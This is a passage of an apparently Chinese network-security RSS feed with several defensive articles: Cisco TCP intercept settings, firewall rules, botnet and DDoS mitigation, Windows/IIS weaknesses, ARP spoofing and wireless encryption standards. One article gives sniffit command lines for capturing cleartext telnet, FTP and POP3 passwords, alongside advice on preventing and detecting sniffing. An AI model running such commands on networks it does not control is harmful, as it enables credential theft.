			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1）定义一个acl，目的是要保护的机器： <br/><br/>access-list 101 per tcp any host 202.106.0.20 <br/><br/><br/>由于没必要匹配源地址，一般的dos都伴随着地址欺骗，所以这里的source都是any. <br/><br/>2）全局下开启tcp intercept. <br/><br/>ip tcp intercept list 101 <br/><br/>3）设置tcp拦截的模式，tcp拦截有两种模式一种是拦截，一种是监视。拦截模式像是一个找茬的流氓，看谁都不爽，见谁都打。监视模式是一个稍微理性一点的流氓，仅仅当别人在他家门口那片空地赌着不走的时候才大打出手（默认是30秒）。见谁都打，肯定累啊。我们要理性一点。 <br/><br/>ip tcp intercept mode watch <br/>ip tcp intercept watch-timeout 20 <br/><br/>4）另外tcp连接你也不能一辈子都让他连着。设置一个tcp超时时间，默认24小时，一般网中特殊服务的需要长连接的应用时候30分钟足咦 <br/><br/>ip tcp intercept connection-timeout 1800 <br/><br/>5）对于最大半开连接的门限也是可以更改的。默认low 900，high 1100. <br/><br/>ip tcp intercept max-incomplete low 800 <br/>ip tcp intercept max-incomplete high 1000 <br/><br/>6）状态查看 <br/><br/>show tcp intercept connecitons <br/>show tcp intercept statistics  ]]></description>
			<link>https://www.cete.vip/show-3349-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3350-1.html</guid>
			<title>拒绝威胁</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;今天我们所处的信息时代，也可以说也是病毒与黑客大行其道的时代，这样说确实有些悲观但今天的网络的确如此，从Internet到企业内网、从个人电脑到可上网的手机平台，没有地方是安全的。每一次网络病毒的攻击，都会让家庭用户、企业用户、800热线甚至是运营商头痛脑热。不过经历过了一次又一次的病毒危机后，人们已经开始思考网络的安全了。现在任何一个企业组建网络都会考虑到购买防火墙，且有越来越多的家庭用户在自己的电脑上甚至宽带接入端也加上了防火墙，相信不久的将来，我们可以看到在手机上也会出现防火墙。 <br/>　　就许多中小企业而言，防火墙的配置往往没有反映出企业的业务需求。如果对防火墙的防护执行设置没有结合企业内部的需求而进行认真充分的定义，添加到防火墙上的安全过滤规则就有可能允许不安全的服务和通信通过，从而给企业网络带来不必要的危险与麻烦。防火墙可以比做一道数据的过滤网，如果事先制定了合理的过滤规则，它将可以截住不合规则的数据报文，从而起到过滤的作用。相反，如果规则不正确，将适得其反。<br/>中小企业防火墙应具有哪些功能<br/>　　如何合理实施防火墙的配置呢？首先，让我们来看看中小企业防火墙一般都应具有哪些功能：<br/>　　1． 动态包过滤技术，动态维护通过防火墙的所有通信的状态（连接），基于连接的过滤；<br/>　　2． 可以作为部署NAT（Network Address Translation，网络地址变换）的地点，利用NAT技术，将有限的IP地址动态或静态地与内部的IP地址对应起来，用来缓解地址空间短缺的问题；<br/>　　3． 可以设置信任域与不信任域之间数据出入的策略；<br/>　　4． 可以定义规则计划，使得系统在某一时可以自动启用和关闭策略；<br/>　　5． 具有详细的日志功能，提供防火墙符合规则报文的信息、系统管理信息、系统故障信息的记录，并支持日志服务器和日志导出；<br/>　　6． 具有IPSec VPN功能，可以实现跨互联网安全的远程访问；<br/>　　7． 具有邮件通知功能，可以将系统的告警通过发送邮件通知网络管理员；<br/>　　8． 具有攻击防护功能对不规则的IP、TCP报或超过经验阀值的TCP半连接、UDP报文以及ICMP报文采取丢弃；<br/>　　9． Web中的Java, ActiveX, Cookie、URL关键字、Proxy进行过滤。<br/>　　以上是中小企业防火墙所应具备的一些防护特性，当然随着技术的发展中小企业防火墙的功能会变得越来越丰富；但有再多功能的防火墙如果没有合理的配置和管理，那么这只是一件IT摆设．　　<br/>如何实施防火墙配置<br/>　　如何实施防火墙配置呢？我们分别从以下几方面来讨论：<br/>　　规则实施<br/>　　规则实施看似简单，其实需要经过详尽的信息统计才可以得以实施。在过程中我们需要了解公司对内对外的应用以及所对应的源地址、目的地址、TCP或UDP的端口，并根据不同应用的执行频繁程度对策率在规则表中的位置进行排序，然后才能实施配置。原因是防火墙进行规则查找时是顺序执行的，如果将常用的规则放在首位就可以提高防火墙的工作效率。另外，应该及时地从病毒监控部门得到病毒警告，并对防火墙的策略进行更新也是制定策略所必要的手段。<br/>　　规则启用计划<br/>　　通常有些策略需要在特殊时刻被启用和关闭，比如凌晨3：00。而对于网管员此时可能正在睡觉，为了保证策略的正常运作，可以通过规则启用计划来为该规则制定启用时间。另外，在一些企业中为了避开上网高峰和攻击高峰，往往将一些应用放到晚上或凌晨来实施，比如远程数据库的同步、远程信息采集等等，遇到这些需求网管员可以通过制定详细的规则和启用计划来自动维护系统的安全。<br/>　　日志监控<br/>　　日志监控是十分有效的安全管理手段，往往许多管理员认为只要可以做日志的信息，都去采集，比如说对所有的告警或所有与策略匹配或不匹配的流量等等，这样的做法看似日志信息十分完善，但可以想一下每天进出防火墙的数据报文有上百万甚至更多，你如何在这些密密麻麻的条目中分析你所需要的信息呢？虽然有一些软件可以通过分析日志来获得图形或统计数据，但这些软件往往需要去二次开发或制定，而且价格不菲。所以只有采集到最关键的日志才是真正有用的日志。<br/>　　一般而言，系统的告警信息是有必要记录的，但对于流量信息是应该有选择的。有时候为了检查某个问题我们可以新建一条与该问题匹配的策略并对其进行观测。比如：内网发现蠕虫病毒，该病毒可能会针对主机系统某UDP端口进行攻击，网管员虽然已经将该病毒清除，但为了监控有没有其他的主机受感染，我们可以为该端口增加一条策略并进行日志来检测网内的流量。<br/>　　另外，企业防火墙可以针对超出经验阀值的报文做出响应，如丢弃、告警、日志等动作，但是所有的告警或日志是需要认真分析的，系统的告警支持根据经验值来确定的，比如对于工作站和服务器来说所产生的会话数是完全不同的，所以有时会发现系统告知一台邮件服务器在某端口发出攻击,而很有可能是这台服务器在不断的重发一些没有响应的邮件造成的。<br/>　　设备管理<br/>　　对于企业防火墙而言，设备管理方面通常可以通过远程Web管理界面的访问以及Internet外网口被Ping来实现，但这种方式是不太安全的，因为有可能防火墙的内置Web服务器会成为攻击的对象。所以建议远程网管应该通过IPsec VPN的方式来实现对内端口网管地址的管理。 ]]></description>
			<link>https://www.cete.vip/show-3350-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3348-1.html</guid>
			<title>驱逐威胁</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;僵尸网络（Botnet）是指多台被恶意代码感染、控制的与互联网相连接的计算机。Botnet正成为一种日益严重的威胁，不过，只要我们用好对付它的六把利剑，僵尸网络就难以造成严重的祸患。 <br/>　　第一剑：采用Web过滤服务 <br/>　　Web过滤服务是迎战僵尸网络的最有力武器。这些服务扫描Web站点发出的不正常的行为，或者扫描已知的恶意活动，并且阻止这些站点与用户接触。&nbsp;&nbsp;<br/>　　第二剑：转换浏览器 <br/>　　防止僵尸网络感染的另一种策略是浏览器的标准化，而不是仅仅依靠微软的Internet Explorer 或Mozilla 的Firefox。当然这两者确实是最流行的，不过正因为如此，恶意软件作者们通常也乐意为它们编写代码。同样的策略也适用于操作系统。据统计，Macs很少受到僵尸网络的侵扰，正如桌面Linux操作系统，因为大多数僵尸的罪魁祸首都把目标指向了流行的Windows。 <br/>　　第三剑：禁用脚本 <br/>　　另一个更加极端的措施是完全地禁用浏览器的脚本功能，虽然有时候这会不利于工作效率，特别是如果雇员们在其工作中使用了定制的、基于Web的应用程序时，更是这样。 <br/>　　第四剑：部署入侵检测和入侵防御系统 <br/>　　另一种方法是调整你的IDS（入侵检测系统）和IPS（入侵防御系统），使之查找有僵尸特征的活动。例如，重复性的与外部的IP地址连接或非法的DNS地址连接都是相当可疑的。虽然难于发现，不过，另一个可以揭示僵尸的征兆是在一个机器中SSL通信的突然上升，特别是在某些端口上更是这样。这就可能表明一个僵尸控制的通道已经被激活了。您需要找到那些将电子邮件路由到其它服务器而不是路由到您自己的电子邮件服务器的机器，它们也是可疑的。僵尸网络的专家Gadi Evron进一步建议，您应该学会监视在高层对Web进行访问的家伙。它们会激活位于一个Web页面上的所有的链接，而一个高层次的访问可能会指明一台机器正被一个恶意的Web站点所控制。 <br/>　　一个IPS或IDS系统可以监视不正常的行为，这些行为指明了难于发现的、基于HTTP的攻击和来自远程过程的攻击、Telnet和地址解析协议（即ARP）欺骗等等。然而，值得注意的是，许多IPS检测器使用基于特征的检测技术，也就是说，这些攻击被发现时的特征被添加到一个数据库中，如果数据库中没有有关的特征就无法检测出来。因此，IPS或IDS就必须经常性的更新其数据库以识别有关的攻击，对于犯罪活动的检测需要持续不断的努力。 <br/>　　第五剑：保护用户生成的内容 <br/>　　还应该保护你的WEB操作人员，使其避免成为“稀里糊涂”的恶意软件犯罪的帮凶。如果你并没有朝着WEB 2.0社会网络迈进，你公司的公共博客和论坛就应该限制为只能使用文本方式，这也是Web Crossing的副总裁Michael Krieg的观点。 <br/>　　Krieg 说，“我并不清楚我们成千上万的用户有哪一个在消息文本中允许了JavaScript，我也不清楚谁在其中嵌入了代码和其它的HTML标签。我们不允许人们这样做。我们的应用程序在默认情况下要将这些东西剥离出去。” <br/>　　Dan Hubbard是Websense安全研究的副总裁，他补充说，“那是用户创建内容站点的一个严重问题，即Web 2.0现象。你怎么才能在允许人们上传内容的强大功能与不允许他们上传不良的东西之间寻求平衡呢？” <br/>　　这个问题的答案是很明确的。如果你的站点需要让会员或用户交换文件，就应该进行设置，使其只允许有限的和相对安全的文件类型，如那些以.jpeg或MP3为扩展名的文件。（不过，恶意软件的作者们已经开始针对MP3等播放器类型，编写了若干蠕虫。而且随着其技术水平的发现，有可能原来安全的文件类型也会成为恶意软件的帮凶。） <br/>　　第六剑：使用补救工具 <br/>　　如果你发现了一台被感染的计算机，那么一个临时应急的重要措施就是如何进行补救。反病毒厂商也都试图保护系统免受rootkit的危害。 <br/>　　用一句成语讲，这就叫做“亡羊补牢”。Evron相信，保持一台计算机绝对安全干净、免受僵尸感染的方法是对原有的系统彻底清楚，并从头开始安装系统。 <br/>　　不要让你的用户访问已知的恶意站点，并监视网络中的可疑行为，保护你的公共站点免受攻击，你的网络就基本上处于良好状态。这是安全专家们一致的观点。 <br/>　　可以注意到，如果一个网络工作人员对于网络安全百思不得其解，并会油然而生这样一种感觉,‘我应该怎么对付这些数以百万的僵尸呢?’。”其实，答案非常简单，“只需断开你的网络，使其免受感染─病毒、木马、间谍软件或广告软件等……。将它当作一台PC上的一个流氓文件来进行清除(不过，谁又能保证真正清除干净呢？)。这就是你需要做的全部事情。” ]]></description>
			<link>https://www.cete.vip/show-3348-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3347-1.html</guid>
			<title>祥解DDoS原理</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;一、阻断服务(Denial of Service) 　　在探讨DDoS 之前我们需要先对 DoS 有所了解，DoS泛指黑客试图妨碍正常使用者使用网络上的服务，例如剪断大楼的电话线路造成用户无法通话。而以网络来说，由于频宽、网络设备和服务器主机等处理的能力都有其限制，因此当黑客产生过量的网络封包使得设备处理不及，即可让正常的使用者无法正常使用该服务。例如黑客试图用大量封包攻击一般频宽相对小得多的拨接或 ADSL 使用者，则受害者就会发现他要连的网站连不上或是反应十分缓慢。 　　DoS 攻击并非入侵主机也不能窃取机器上的资料，但是一样会造成攻击目标的伤害，如果攻击目标是个电子商务网站就会造成顾客无法到该网站购物。 　　二、分布式阻断服务(Distributed Denial of Service) 　　DDoS 则是 DoS 的特例，黑客利用多台机器同时攻击来达到妨碍正常使用者使用服务的目的。黑客预先入侵大量主机以后，在被害主机上安装 DDoS 攻击程控被害主机对攻击目标展开攻击；有些 DDoS 工具采用多层次的架构，甚至可以一次控制高达上千台电脑展开攻击，利用这样的方式可以有效产生极大的网络流量以瘫痪攻击目标。早在2000年就发生过针对Yahoo, eBay, Buy.com 和 CNN 等知名网站的DDoS攻击，阻止了合法的网络流量长达数个小时。 　　DDoS 攻击程序的分类，可以依照几种方式分类，以自动化程度可分为手动、半自动与自动攻击。早期的 DDoS 攻击程序多半属于手动攻击，黑客手动寻找可入侵的计算机入侵并植入攻击程序，再下指令攻击目标；半自动的攻击程序则多半具有 handler 控制攻击用的agent 程序，黑客散布自动化的入侵工具植入 agent 程序，然后使用 handler 控制所有agents 对目标发动 DDoS 攻击；自动攻击更进一步自动化整个攻击程序，将攻击的目标、时间和方式都事先写在攻击程序里，黑客散布攻击程序以后就会自动扫描可入侵的主机植入 agent 并在预定的时间对指定目标发起攻击，例如近期的 W32/Blaster 网虫即属于此类。 　　若以攻击的弱点分类则可以分为协议攻击和暴力攻击两种。协议攻击是指黑客利用某个网络协议设计上的弱点或执行上的 bug 消耗大量资源，例如 TCP SYN 攻击、对认证伺服器的攻击等；暴力攻击则是黑客使用大量正常的联机消耗被害目标的资源，由于黑客会准备多台主机发起 DDoS 攻击目标，只要单位时间内攻击方发出的网络流量高于目标所能处理速度，即可消耗掉目标的处理能力而使得正常的使用者无法使用服务。 　　若以攻击频率区分则可分成持续攻击和变动频率攻击两种。持续攻击是当攻击指令下达以后，攻击主机就全力持续攻击，因此会瞬间产生大量流量阻断目标的服务，也因此很容易被侦测到；变动频率攻击则较为谨慎，攻击的频率可能从慢速渐渐增加或频率高低变化，利用这样的方式延缓攻击被侦测的时间。 　　三、从 DDoS 攻击下存活 　　那么当遭受 DDoS 攻击的时候要如何设法存活并继续提供正常服务呢？由先前的介绍可以知道，若黑客攻击规模远高于你的网络频宽、设备或主机所能处理的能力，其实是很难以抵抗攻击的，但仍然有一些方法可以减轻攻击所造成的影响。 　　首先是调查攻击来源，由于黑客经由入侵机器进行攻击，因此你可能无法查出黑客是由哪里发动攻击，我们必须一步一步从被攻击目标往回推，先调查攻击是由管辖网络的哪些边界路由器进来，上一步是外界哪台路由器，连络这些路由器的管理者(可能是某个ISP或电信公司)并寻求他们协助阻挡或查出攻击来源，而在他们处理之前可以进行哪些处理呢? 　　如果被攻击的目标只是单一 ip，那么试图改个 ip 并更改其 DNS mapping 或许可以避开攻击，这是最快速而有效的方式；但是攻击的目的就是要使正常使用者无法使用服务，更改ip的方式虽然避开攻击，以另一角度来看黑客也达到了他的目的。此外，如果攻击的手法较为单纯，可以由产生的流量找出其规则，那么利用路由器的 ACLs(Access Control Lists)或防火墙规则也许可以阻挡，若可以发现流量都是来自同一来源或核心路由器，可以考虑暂时将那边的流量挡起来，当然这还是有可能将正常和异常的流量都一并挡掉，但至少其它来源可以得到正常的服务，这有时是不得已的牺牲。如果行有余力，则可以考虑增加机器或频宽作为被攻击的缓冲之用，但这只是治标不治本的做法。最重要的是必须立即着手调查并与相关单位协调解决。 　　四、预防DDoS攻击 　　DDoS 必须透过网络上各个团体和使用者的共同合作，制定更严格的网络标准来解决。每台网络设备或主机都需要随时更新其系统漏洞、关闭不需要的服务、安装必要的防毒和防火墙软件、随时注意系统安全，避免被黑客和自动化的 DDoS 程序植入攻击程序，以免成为黑客攻击的帮凶。 　　有些 DDoS 会伪装攻击来源，假造封包的来源 ip，使人难以追查，这个部份可以透过设定路由器的过滤功能来防止，只要网域内的封包来源是其网域以外的 ip，就应该直接丢弃此封包而不应该再送出去，如果网管设备都支持这项功能，网管人员都能够正确设定过滤掉假造的封包，也可以大量减少调查和追踪的时间。 　　网域之间保持联络是很重要的，如此才能有效早期预警和防治 DDoS 攻击，有些 ISP会在一些网络节点上放置感应器侦测突然的巨大流量，以提早警告和隔绝 DDoS 的受害区域，降低顾客的受害程度。  ]]></description>
			<link>https://www.cete.vip/show-3347-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3346-1.html</guid>
			<title>系统安全决定网络安全</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;·默认安装操作系统和应用程序 <br/><br/>许多用户没有正确评价安装在他们的机器中的程序。Windows和IIS都安装了过剩的服务和危险样本。这种没有使用补丁的服务、样本程序和代码提供了攻击网站的手段。 <br/><br/>·采用软弱的口令或者没有口令的账户 <br/><br/>IIS使用一些内置的或者默认的账户。攻击者通常寻找这些账户。应该找出这些账户并且进行修改，如果不把这些账户从系统中删除的话。 <br/><br/>·大量的开放端口 <br/><br/>每一个访问者无论好坏都通过一个开放的端口访问网站或者系统。在默认状态下，Windows和IIS都比是继续需要配置了更多的开放端口。重要的是保持系统有最低数量的开放端口。关闭所有其它端口。 <br/><br/>·Windows许可证登录服务溢出 <br/><br/>通过向运行许可证登录服务的网站服务器发特殊格式的消息，攻击者能够利用没有检查的缓存。这将引起服务故障，为黑客创造一个以“系统”权限在这台服务器上执行代码的大门。 <br/><br/>·微软服务器消息块(SMB) <br/><br/>Windows使用服务器消息块协议共享文件和打印机和进行计算机之间的沟通。黑客的服务器消息块服务器能够利用这个功能以“系统”权限在客户机上执行任意代码。 <br/><br/>·ISAPI扩展缓存溢出 <br/><br/>一些ISAPI(互联网服务器应用程序编程接口)扩展是与IIS一起自动安装的。ISAPI实际上是动态连接库，扩展IIS服务器的功能。像idq.dll等一些动态连接库包含编程错误，能够让攻击者向ISAPI扩展发送数据，引起拒绝服务攻击。这样，攻击者就能够完全控制这个网络服务器。 <br/><br/>·Unicode安全漏洞(Web服务器文件夹遍历) <br/><br/>通过向IIS服务器发送一个精心制作的包含非法Unicode 队列的URL，攻击者能够绕过正常的IIS安全检查。强迫服务器离开一个目录并且执行任意的脚本。 ]]></description>
			<link>https://www.cete.vip/show-3346-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3345-1.html</guid>
			<title>简单了解局域网内部的ARP攻击</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。 <br/>基于ARP协议的这一工作特性，黑客向对方计算机不断发送有欺诈性质的ARP数据包，数据包内包含有与当前设备重复的Mac地址，使对方在回应报文时，由于简单的地址重复错误而导致不能进行正常的网络通信。一般情况下，受到ARP攻击的计算机会出现两种现象: <br/>1.不断弹出“本机的XXX段硬件地址与网络中的XXX段地址冲突”的对话框。 <br/>2.计算机不能正常上网，出现网络中断的症状。 <br/>因为这种攻击是利用ARP请求报文进行“欺骗”的，所以防火墙会误以为是正常的请求数据包，不予拦截。因此普通的防火墙很难抵挡这种攻击。 ]]></description>
			<link>https://www.cete.vip/show-3345-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3344-1.html</guid>
			<title>Sniffit常见问题及防范策略深入分析</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1. sniffit 既是个优秀的管理工具也是个危险的侵入工具。可被管理员用来检查网络中到底传输了些什么，学习各种tcp/ip协议的工作方法，也能被攻击者利用，主要是记录密码。<br/>2. 工作原理： 为什么能检查密码和不是传送给自己的数据呢？ <br/>在典型的LAN环境中，（指共享式HUB上连接的两个用户A和B），基于共享式HUB的工作原理，用户A发出的所有tcp/ip请求在HUB的每个端口上广播，正常情况下，B不接收这些目标地址不是自己的数据，但是一旦我们在B机上运行sniffit一类的监听工具，就能置网卡于第三种叫混杂模式的状态下（前两种为tcp,udp模式），在该状态下，网卡接受所有的数据，不管是发给自己的，还是不发给自己的，都被网卡接收并直接传给最上层应用层，交由相应的软件如sniffit处理。<br/>3。常见用法 <br/>a. 检测telnet/ftp/pop3密码： <br/>#sniffit -a -A. -p 23 -b -t 192.168.11.@ <br/>#sniffit -a -A. -p 110 -b -t 192.168.11.1 (pop3 server) <br/>b. 查看http头信息 <br/>#sniffit -a -A. -p 80 -b -s 1.2.3.4 (1.2.3.4是防火墙外部地址） <br/>c. 记录输出到文件 <br/>#sniffit -p 21 -l 0 -b -s 192.168.11.2 &amp; <br/>d. 查看icmp消息 <br/>#sniffit -p icmp -b -s 192.168.1.2 <br/>e. 交互式界面 <br/>#sniffit -i <br/>f. 检查本网段内发出名字广播的机器 <br/>#sniffit -a -A. -P udp -p 137 -b -s 192.168.11.255 <br/>g. 注意防火墙的情况 <br/>若要检查防火墙内部网卡上的包eth1，可能你要设置 -F eth1参数，因为默认地sniffit 假设为eth0 <br/>4.哪些信息是敏感的和易被检测的？ <br/>telnet/ftp/pop3的密码都是明文传送的，都是易被检测的，apache的基本方式的用户名/密码认证也是UU编码后的口令，也是易被检测的。 <br/>5. 怎样阻止？ <br/>硬件： 不要用普通的共享式HUB，用交换机来代替它，目前只有交换机和路由器能阻止sniffit的作用<br/>软件： 用带加密功能的tcp/ip连接，象ssh/scp全面代替telnet/ftp/pop3，用MD5方式的apache认证 <br/>6。作用范围: <br/>仅在逻辑子网内有效，不能跨子网，因为广播不被路由器传递，但若是在服务器上运行sniffit，则任何方法均无效，对防火墙来说，通常sniffit攻击是第二层攻击，就是先得到一个普通帐号进入再探寻更多的口令。 <br/>7. 怎样判断是否有人在用sniffit? <br/>可检测网络接口（ifconfig)看是否处于混杂模式来确认是否被侵入并安装了sniffit，只限本机。 ]]></description>
			<link>https://www.cete.vip/show-3344-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3343-1.html</guid>
			<title>确保无线网络安全实施的几种技术规范</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;服务集标识符(SSID) <br/><br/>通过对多个无线接入点AP(Access Point)设置不同的SSID，并要求无线工作站出示正确的SSID才能访问AP，这样就可以允许不同群组的用户接入，并对资源访问的权限进行区别限制。因此可以认为SSID是一个简单的口令，从而提供一定的安全，但如果配置AP向外广播其SSID，那么安全程度还将下降。由于一般情况下，用户自己配置客户端系统，所以很多人都知道该SSID，很容易共享给非法用户。目前有的厂家支持"任何(ANY)"SSID方式，只要无线工作站在任何AP范围内，客户端都会自动连接到AP，这将跳过SSID安全功能。 <br/><br/>物理地址过滤(MAC) <br/><br/>由于每个无线工作站的网卡都有唯一的物理地址，因此可以在AP中手工维护一组允许访问的MAC地址列表，实现物理地址过滤。这个方案要求AP 中的MAC地址列表必需随时更新，可扩展性差;而且MAC地址在理论上可以伪造，因此这也是较低级别的授权认证。物理地址过滤属于硬件认证，而不是用户认证。这种方式要求AP中的MAC地址列表必需随时更新，目前都是手工操作;如果用户增加，则扩展能力很差，因此只适合于小型网络规模。 <br/><br/>连线对等保密(WEP) <br/><br/>在链路层采用RC4对称加密技术，用户的加密密钥必须与AP的密钥相同时才能获准存取网络的资源，从而防止非授权用户的监听以及非法用户的访问。WEP提供了40位(有时也称为64位)和128位长度的密钥机制，但是它仍然存在许多缺陷，例如一个服务区内的所有用户都共享同一个密钥，一个用户丢失钥匙将使整个网络不安全。而且40位的钥匙在今天很容易被破解;钥匙是静态的，要手工维护，扩展能力差。目前为了提高安全性，建议采用128位加密钥匙。 <br/><br/>Wi-Fi保护接入(WPA) <br/><br/>WPA(Wi-Fi Protected Access)是继承了WEP基本原理而又解决了WEP缺点的一种新技术。由于加强了生成加密密钥的算法，因此即便收集到分组信息并对其进行解析，也几乎无法计算出通用密钥。其原理为根据通用密钥，配合表示电脑MAC地址和分组信息顺序号的编号，分别为每个分组信息生成不同的密钥。然后与WEP一样将此密钥用于RC4加密处理。通过这种处理，所有客户端的所有分组信息所交换的数据将由各不相同的密钥加密而成。无论收集到多少这样的数据，要想破解出原始的通用密钥几乎是不可能的。WPA还追加了防止数据中途被篡改的功能和认证功能。由于具备这些功能，WEP中此前倍受指责的缺点得以全部解决。WPA不仅是一种比WEP更为强大的加密方法，而且有更为丰富的内涵。作为802.11i标准的子集，WPA包含了认证、加密和数据完整性校验三个组成部分，是一个完整的安全性方案。 <br/><br/>国家标准(WAPI) <br/><br/>WAPI(WLAN Authenticationand Privacy Infrastructure)，即无线局域网鉴别与保密基础结构，它是针对IEEE802.11中WEP协议安全问题，在中国无线局域网国家标准 GB15629.11中提出的WLAN安全解决方案。同时本方案已由ISO/IEC授权的机构IEEE Registration Authority审查并获得认可。它的主要特点是采用基于公钥密码体系的证书机制，真正实现了移动终端(MT)与无线接入点(AP)间双向鉴别。用户只要安装一张证书就可在覆盖WLAN的不同地区漫游，方便用户使用。与现有计费技术兼容的服务，可实现按时计费、按流量计费、包月等多种计费方式。AP设置好证书后，无须再对后台的AAA服务器进行设置，安装、组网便捷，易于扩展，可满足家庭、企业、运营商等多种应用模式。 <br/><br/>端口访问控制技术(802.1x) <br/><br/>该技术也是用于无线局域网的一种增强性网络安全解决方案。当无线工作站STA与无线访问点AP关联后，是否可以使用AP的服务要取决于802.1x的认证结果。如果认证通过，则AP为STA打开这个逻辑端口，否则不允许用户上网。802.1x要求无线工作站安装802.1x客户端软件，无线访问点要内嵌802.1x认证代理，同时它还作为Radius客户端，将用户的认证信息转发给Radius服务器。802.1x除提供端口访问控制能力之外，还提供基于用户的认证系统及计费，特别适合于公共无线接入解决方案。 ]]></description>
			<link>https://www.cete.vip/show-3343-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2009-02-25 14:58</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3342-1.html</guid>
			<title>网络安全防范体系及设计上的原则</title>
			<author>海东青</author>
			<description><![CDATA[ 	<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;一、引 言<br/>　　随着信息化进程的深入和互联网的快速发展，网络化已经成为企业信息化的发展大趋势，信息资源也得到最大程度的共享。但是，紧随信息化发展而来的网络安全问题日渐凸出，网络安全问题已成为信息时代人类共同面临的挑战，网络信息安全问题成为当务之急，如果不很好地解决这个问题，必将阻碍信息化发展的进程。<br/>二、安全攻击、安全机制和安全服务 <br/>　　ITU-T X.800标准将我们常说的“网络安全（networksecurity）”进行逻辑上的分别定义，即安全攻击(security attack)是指损害机构所拥有信息的安全的任何行为；安全机制（security mechanism）是指设计用于检测、预防安全攻击或者恢复系统的机制；安全服务（security service）是指采用一种或多种安全机制以抵御安全攻击、提高机构的数据处理系统安全和信息传输安全的服务。<br/>三、网络安全防范体系框架结构<br/>　　为了能够有效了解用户的安全需求，选择各种安全产品和策略，有必要建立一些系统的方法来进行网络安全防范。网络安全防范体系的科学性、可行性是其可顺利实施的保障。图1给出了基于DISSP扩展的一个三维安全防范技术体系框架结构。第一维是安全服务，给出了八种安全属性（ITU-T REC-X.800-199103-I）。第二维是系统单元，给出了信息网络系统的组成。第三维是结构层次，给出并扩展了国际标准化组织ISO的开放系统互联（OSI）模型。 <br/>　　框架结构中的每一个系统单元都对应于某一个协议层次，需要采取若干种安全服务才能保证该系统单元的安全。网络平台需要有网络节点之间的认证、访问控制，应用平台需要有针对用户的认证、访问控制，需要保证数据传输的完整性、保密性，需要有抗抵赖和审计的功能，需要保证应用系统的可用性和可靠性。针对一个信息网络系统，如果在各个系统单元都有相应的安全措施来满足其安全需求，则我们认为该信息网络是安全的。<br/>四、网络安全防范体系层次<br/>　　作为全方位的、整体的网络安全防范体系也是分层次的，不同层次反映了不同的安全问题，根据网络的应用现状情况和网络的结构，我们将安全防范体系的层次划分为物理层安全、系统层安全、网络层安全、应用层安全和安全管理。 <br/>1．物理环境的安全性（物理层安全） <br/>　　该层次的安全包括通信线路的安全，物理设备的安全，机房的安全等。物理层的安全主要体现在通信线路的可靠性（线路备份、网管软件、传输介质），软硬件设备安全性（替换设备、拆卸设备、增加设备），设备的备份，防灾害能力、防干扰能力，设备的运行环境（温度、湿度、烟尘），不间断电源保障，等等。 <br/>2．操作系统的安全性（系统层安全） <br/>　　该层次的安全问题来自网络内使用的操作系统的安全，如Windows NT，Windows 2000等。主要表现在三方面，一是操作系统本身的缺陷带来的不安全因素，主要包括身份认证、访问控制、系统漏洞等。二是对操作系统的安全配置问题。三是病毒对操作系统的威胁。 <br/>3．网络的安全性（网络层安全） <br/>　　该层次的安全问题主要体现在网络方面的安全性，包括网络层身份认证，网络资源的访问控制，数据传输的保密与完整性，远程接入的安全，域名系统的安全，路由系统的安全，入侵检测的手段，网络设施防病毒等。 <br/>4．应用的安全性（应用层安全） <br/>　　该层次的安全问题主要由提供服务所采用的应用软件和数据的安全性产生，包括Web服务、电子邮件系统、DNS等。此外，还包括病毒对系统的威胁。 <br/>5．管理的安全性（管理层安全） <br/>　　安全管理包括安全技术和设备的管理、安全管理制度、部门与人员的组织规则等。管理的制度化极大程度地影响着整个网络的安全，严格的安全管理制度、明确的部门安全职责划分、合理的人员角色配置都可以在很大程度上降低其它层次的安全漏洞。<br/>五、网络安全防范体系设计准则<br/>　　根据防范安全攻击的安全需求、需要达到的安全目标、对应安全机制所需的安全服务等因素，参照SSE-CMM("系统安全工程能力成熟模型")和ISO17799(信息安全管理标准)等国际标准，综合考虑可实施性、可管理性、可扩展性、综合完备性、系统均衡性等方面，网络安全防范体系在整体设计过程中应遵循以下9项原则： <br/>1．网络信息安全的木桶原则 <br/>　　